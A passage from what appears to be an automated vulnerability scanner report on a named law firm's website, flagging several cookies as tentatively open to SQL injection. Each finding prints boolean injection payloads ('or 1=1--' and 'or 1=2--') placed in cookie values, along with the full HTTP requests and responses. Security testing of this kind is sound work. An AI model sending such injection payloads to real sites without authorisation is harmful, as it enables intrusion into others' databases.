Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953792255674%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 16:11:35 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953792255674%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.80. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 92347001%20or%201%3d1--%20 and 92347001%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898892347001%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 16:11:41 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898892347001%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.81. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 21326148'%20or%201%3d1--%20 and 21326148'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=21326148'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 16:12:00 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=21326148'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.82. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 15468633'%20or%201%3d1--%20 and 15468633'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=15468633'%20or%201%3d1--%20; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 16:12:06 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=15468633'%20or%201%3d2--%20; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.83. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCONNECTID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 69977606'%20or%201%3d1--%20 and 69977606'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=69977606'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 16:11:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=69977606'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.84. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

